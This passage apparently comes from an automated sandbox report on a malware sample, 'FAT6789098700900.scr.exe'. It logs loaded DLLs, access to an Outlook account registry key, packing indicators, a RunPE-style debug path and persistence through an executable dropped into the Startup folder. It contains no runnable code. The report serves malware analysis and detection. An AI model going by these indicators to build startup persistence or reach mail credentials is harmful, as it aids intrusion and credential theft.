                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wininet.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: pstorec.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: vaultcli.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: pstorec.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: FAT6789098700900.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: FAT6789098700900.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, FAT6789098700900.scr.exe, 00000000.00000002.4127461321.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4127237060.0000000002751000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4127237060.000000000278F000.00000004.00000800.00020000.00000000.sdmp, .exe, 00000008.00000002.4138278336.0000000004DA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: hDa(]XfUC.pDbQcwewjYj5 source: FAT6789098700900.scr.exe, .exe.1.dr

                  Data Obfuscation

                  barindex
                  Source: FAT6789098700900.scr.exe, --.cs.Net Code: CreateInstance
                  Source: FAT6789098700900.scr.exeStatic PE information: 0xF6B4BD18 [Mon Feb 28 13:20:24 2101 UTC]
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_004158B5 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004158B5
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_026BF052 push esp; iretd 0_2_026BF059
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053E8D18 pushfd ; iretd 0_2_053E8D21
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053E8C92 push eax; iretd 0_2_053E8C99
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeCode function: 0_2_053E86A0 push esp; retf 0_2_053E86A1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_00DBC992 push cs; ret 8_2_00DBC99E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_00DBF7C8 push ebx; ret 8_2_00DBF7E2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_00DB9D81 push ss; ret 8_2_00DB9D8E
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 8_2_071D86A0 push esp; retf 8_2_071D86A1
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10002806 push ecx; ret 11_2_10002819
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_10009FD8 push esi; ret 11_2_10009FD9
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0044D096 push esp; retf 11_2_0044D097
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_0044CA98 push esp; retf 11_2_0044CAA0
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00455EAF push ecx; ret 11_2_00455EC2
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00433FF6 push ecx; ret 11_2_00434009
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00415A0C push esp; ret 11_2_00415A0D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00415C62 push edi; ret 11_2_00415C63
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00406FE8 push edx; retf 11_2_00406FEB
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0A4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_0044B090 push eax; ret 16_2_0044B0CC
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 16_2_00444E71 push ecx; ret 16_2_00444E81
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00414060 push eax; ret 17_2_00414074
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00414060 push eax; ret 17_2_0041409C
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00414039 push ecx; ret 17_2_00414049
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_004164EB push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00416553 push 0000006Ah; retf 17_2_004165C4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 17_2_00416555 push 0000006Ah; retf 17_2_004165C4
                  Source: FAT6789098700900.scr.exeStatic PE information: section name: .text entropy: 7.746666834744435
                  Source: .exe.1.drStatic PE information: section name: .text entropy: 7.746666834744435

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe\:Zone.Identifier:$DATAJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,11_2_00419BC4
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exeCode function: 11_2_00434D22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00434D22
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\FAT6789098700900.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
